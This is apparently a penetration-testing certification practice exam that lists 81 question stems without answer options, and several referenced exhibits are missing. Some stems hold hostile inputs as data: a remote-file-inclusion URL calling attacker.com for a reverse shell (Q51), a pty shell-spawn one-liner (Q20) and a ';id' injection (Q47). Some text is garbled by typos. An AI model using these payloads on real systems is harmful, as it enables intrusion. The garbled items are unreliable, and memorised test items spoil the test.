EMT Practice Test

1. Question Content...


Question List

Question1: A company has engaged a penetration tester to perform an assessment for an application that resides in the company's DMZ. Prior to conducting testing, in which of the following solutions should the penetration tester's IP address be whitelisted?

Question2: You are a penetration tester reviewing a client's website through a web browser.
INSTRUCTIONS
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.








Question3: A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?

Question4: A penetration tester has identified a directory traversal vulnerability.
Which of the following payloads could have helped the penetration tester identify this vulnerability?

Question5: A penetration tester wants to check manually if a "ghost" vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?

Question6: A penetration tester is checking a script to determine why some basic math errors are persisting. The expected result was the program outputting "True".

Given the output from the console above, which of the following explains how to correct the errors in the script? (Choose two.)

Question7: A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the following would BEST meet this goal?

Question8: Which of the following types of physical security attacks does a mantrap mitigate-?

Question9: A penetration test was performed by an on-staff junior technician. During the test, the technician discovered the web application could disclose an SQL table with user account and password information. Which of the following is the MOST effective way to notify management of this finding and its importance?

Question10: D18912E1457D5D1DDCBD40AB3BF70D5D
During the exploitation phase of a penetration test, a vulnerability is discovered that allows command execution on a Linux web server. A cursory review confirms the system access is only in a low-privilege user context: www-dat a. After reviewing, the following output from /etc/sudoers:

Which of the following users should be targeted for privilege escalation?

Question11: A security consultant receives a document outlining the scope of an upcoming penetration test. This document contains IP addresses and times that each can be scanned.
Which of the following would contain this information?

Question12: During an engagement, a consultant identifies a number of areas that need further investigation and require an extension of the engagement.
Which of the following is the MOST likely reason why the engagement may not be able to continue?

Question13: Which of the following tools is used to perform a credential brute force attack?

Question14: Given the following Python script:

Which of the following actions will it perform?

Question15: A penetration tester has performed a security assessment for a startup firm. The report lists a total of ten vulnerabilities, with five identified as critical. The client does not have the resources to immediately remediate all vulnerabilities.
Under such circumstances, which of the following would be the BEST suggestion for the client?

Question16: A penetration tester is in the process of writing a report that outlines the overall level of risk to operations.
In which of the following areas of the report should the penetration tester put this?

Question17: Which of the following is the purpose of an NDA?

Question18: A penetration tester has successfully exploited a Windows host with low privileges and found directories with the following permissions:


Which of the following should be performed to escalate the privileges?

Question19: Which of the following are MOST important when planning for an engagement? (Select TWO).

Question20: A penetration tester runs the following from a compromised box 'python -c -import pty;Pty.sPawn( "/bin/bash").' Which of the following actions is the tester taking?

Question21: A penetration tester has gained physical access to a facility and connected directly into the internal network.
The penetration tester now wants to pivot into the server VLAN. Which of the following would accomplish this?

Question22: Joe, a penetration tester, is asked to assess a company's physical security by gaining access to its corporate office. Joe ism looking for a method that will enable him to enter the building during business hours or when there are no employee on-site. Which of the following would be MOST effective in accomplishing this?

Question23: Which of the following types of intrusion techniques is the use of an "under-the-door tool" during a physical security assessment an example of?

Question24: A penetration tester is preparing to conduct API testing Which of the following would be MOST helpful in preparing for this engagement?

Question25: A penetration tester has performed a vulnerability scan of a specific host that contains a valuable database and has identified the following vulnerabilities:
XSS
HTTP DELETE method allowed
SQL injection
Vulnerable to CSRF
To which of the following should the tester give the HIGHEST priority?

Question26: A penetration tester is testing a web application and is logged in as a lower-privileged user. The tester runs arbitrary JavaScript within an application, which sends an XMLHttpRequest, resulting in exploiting features to which only an administrator should have access.
Which of the following controls would BEST mitigate the vulnerability?

Question27: During testing, a critical vulnerability is discovered on a client's core server.
Which of the following should be the NEXT action?

Question28: Which of Ihe following commands would allow a penetration tester to access a private network from the Internet in Metasploit?

Question29: During testing, a critical vulnerability is discovered on a client's core server.
Which of the following should be the NEXT action?

Question30: A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?

Question31: A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?

Question32: A penetration tester is performing a wireless penetration test.
Which of the following are some vulnerabilities that might allow the penetration tester to easily and quickly access a WPA2-protected access point?

Question33: Joe, a penetration tester, was able to exploit a web application behind a firewall He is trying to get a reverse shell back to his machine but the firewall blocks the outgoing traffic Ports for which of the following should the security consultant use to have the HIGHEST chance to bypass the firewall?

Question34: Which of the following commands starts the Metasploit database?

Question35: A penetration tester calls human resources and begins asking open-ended questions Which of the following social engineering techniques is the penetration tester using?

Question36: A penetration tester wants to target NETBIOS name service. Which of the following is the most likely command to exploit the NETBIOS name service?

Question37: A penetration tester is connected to a client's local network and wants to passively identify cleartext protocols and potentially sensitive data being communicated across the network.
Which of the following is the BEST approach to take?

Question38: A senior employee received a suspicious email from another executive requesting an urgent wire transfer.
Which of the following types of attacks is likely occurring?

Question39: Given the following script:

Which of the following BEST describes the purpose of this script?

Question40: During a vulnerability assessment, the security consultant finds an XP legacy system that is running a criticalmbusiness function.
Which of the following mitigations is BEST for the consultant to conduct?

Question41: An attacker is attempting to gain unauthorized access to a WiR network that uses WPA2-PSK Which of the following attack vectors would the attacker MOST likely use?

Question42: Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?

Question43: A penetration tester is testing a banking application and uncovers a vulnerability. The tester is logged in as a non-privileged user who should have no access to any dat a. Given the data below from the web interception proxy Request POST /Bank/Tax/RTSdocuments/ HTTP 1.1 Host: test.com Accept: text/html; application/xhtml+xml Referrer: https://www.test.com/Bank/Tax/RTSdocuments/ Cookie: PHPSESSIONID: ; Content-Type: application/form-data; Response
403 Forbidden
<tr>
<td> Error:</td></tr>
<tr><td> Insufficient Privileges to view the data. </td></tr>
Displaying 1-10 of 105 records
Which of the following types of vulnerabilities is being exploited?

Question44: At the information gathering stage, a penetration tester is trying to passively identify the technology running on a client's website.
Which of the following approached should the penetration tester take?

Question45: At the beginning of a penetration test, the tester finds a file that includes employee data, such as email addresses, work phone numbers, computers names, and office locations. The file is hosted on a public web server. Which of the following BEST describes the technique that was used to obtain this information?

Question46: A security consultant is trying to attack a device with a previously identified user account.

Which of the following types of attacks is being executed?

Question47: A penetration tester is assessing the security of a web form for a client and enters ";id" in one of the fields.
The penetration tester observes the following response:

Based on the response, which of the following vulnerabilities exists?

Question48: Which of the following excerpts would come from a corporate policy?

Question49: A penetration tester obtained access to an internal host of a given target. Which of the following is the BEST tool to retrieve the passwords of users of the machine exploiting a well-knows architecture flaw of the Windows OS?

Question50: While reviewing logs, a web developer notices the following user input string in a field:

Which of the following types of attacks was done to the website?

Question51: While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:
https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php Which of the following remediation steps should be taken to prevent this type of attack?

Question52: Which of the following wordlists is BEST for cracking MD5 password hashes of an application's users from a compromised database?

Question53: A penetration tester must assess a web service. Which of the following should the tester request during the scoping phase?

Question54: A penetration tester has been hired to perform a penetration test for an organization.
Which of the following is indicative of an error-based SQL injection attack?

Question55: A penetration tester successfully exploits a Windows host and dumps the hashes Which of the following hashes can the penetration tester use to perform a pass-the-hash attack?
A)

B)

C)

D)

Question56: A tester has captured a NetNTLMv2 hash using Responder Which of the following commands will allow the tester to crack the hash using a mask attack?

Question57: A penetration tester runs the following on a machine:

Which of the following will be returned?

Question58: A vulnerability scan identifies that an SSL certificate does not match the hostname; however, the client disputes the finding. Which of the following techniques can the penetration tester perform to adjudicate the validity of the findings?

Question59: A penetration tester used an ASP.NET web shell to gain access to a web application, which allowed the tester to pivot in the corporate network.
Which of the following is the MOST important follow-up activity to complete after the tester delivers the report?

Question60: A penetration tester has compromised a system and wishes to connect to a port on it from the attacking machine to control the system Which of the following commands should the tester run on the compromised system?

Question61: A penetration tester has compromised a Windows server and is attempting to achieve persistence. Which of the following would achieve that goal?

Question62: An attacker performed a MITM attack against a mobile application. The attacker is attempting to manipulate the application's network traffic via a proxy tool. The attacker only sees limited traffic as cleartext. The application log files indicate secure SSL/TLS connections are failing.
Which of the following is MOST likely preventing proxying of all traffic?

Question63: After an Nmap NSE scan, a security consultant is seeing inconsistent results while scanning a host. Which of the following is the MOST likely cause?

Question64: A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below:
IP: 192.168.1.20
NETMASK: 255.255.255.0
DEFAULT GATEWAY: 192.168.1.254
DHCP: 192.168.1.253
DNS: 192.168.10.10, 192.168.20.10
Which of the following commands should the malicious user execute to perform the MITM attack?

Question65: Instructions:
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.

Question66: An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used m this attack?

Question67: While engaging clients for a penetration test from highly regulated industries, which of the following is usually the MOST important to the clients from a business perspective?

Question68: A company contracted a firm specializing in penetration testing to assess the security of a core business application. The company provided the firm with a copy of the Java bytecode. Which of the following steps must the firm take before it can run a static code analyzer?

Question69: An SMB server was discovered on the network, and the penetration tester wants to see if the server it vulnerable. Which of the following is a relevant approach to test this?

Question70: After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user's folder titled "changepass"
-sr -xr -x 1 root root 6443 Oct 18 2017 /home/user/changepass
Using "strings" to print ASCII printable characters from changepass, the tester notes the following:
$ strings changepass
Exit
setuid
strmp
GLINC _2.0
ENV_PATH
%s/changepw
malloc
strlen
Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machines?

Question71: A penetration tester ran the following Nmap scan on a computer:
nmap -aV 192.168.1.5
The organization said it had disabled Telnet from its environment. However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH. Which of the following is the BEST explanation for what happened?

Question72: A penetration tester discovers Heartbleed vulnerabilities in a target network Which of the following impacts would be a result of exploiting this vulnerability?

Question73: Which of the following documents BEST describes the manner in which a security assessment will be conducted?

Question74: A penetration tester has run multiple vulnerability scans against a target system. Which of the following would be unique to a credentialed scan?

Question75: A penetration tester is planning to conduct a distributed dictionary attack on a government domain against the login portal. The tester will leverage multiple proxies to mask the origin IPs of the attack. Which of the following threat actors will be emulated?

Question76: A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?

Question77: The results of a basic compliance scan show a subset of assets on a network. This data differs from what is shown on the network architecture diagram, which was supplied at the beginning of the test. Which of the following are the MOST likely causes for this difference? (Select TWO)

Question78: A penetration tester has performed a pivot to a new Linux device on a different network. The tester writes the following command:
for m in {1..254..1};do ping -c 1 192.168.101.$m; done
Which of the following BEST describes the result of running this command?

Question79: If a security consultant comes across a password hash that resembles the following b117 525b3454 7Oc29ca3dBaeOb556ba8 Which of the following formats is the correct hash type?

Question80: After successfully enumerating users on an Active Directory domain controller using enum4linux a penetration tester wants to conduct a password-guessing attack Given the below output:

Which of the following can be used to extract usernames from the above output prior to conducting the attack?

Question81: Which of the following actions BEST matches a script kiddie's threat actor?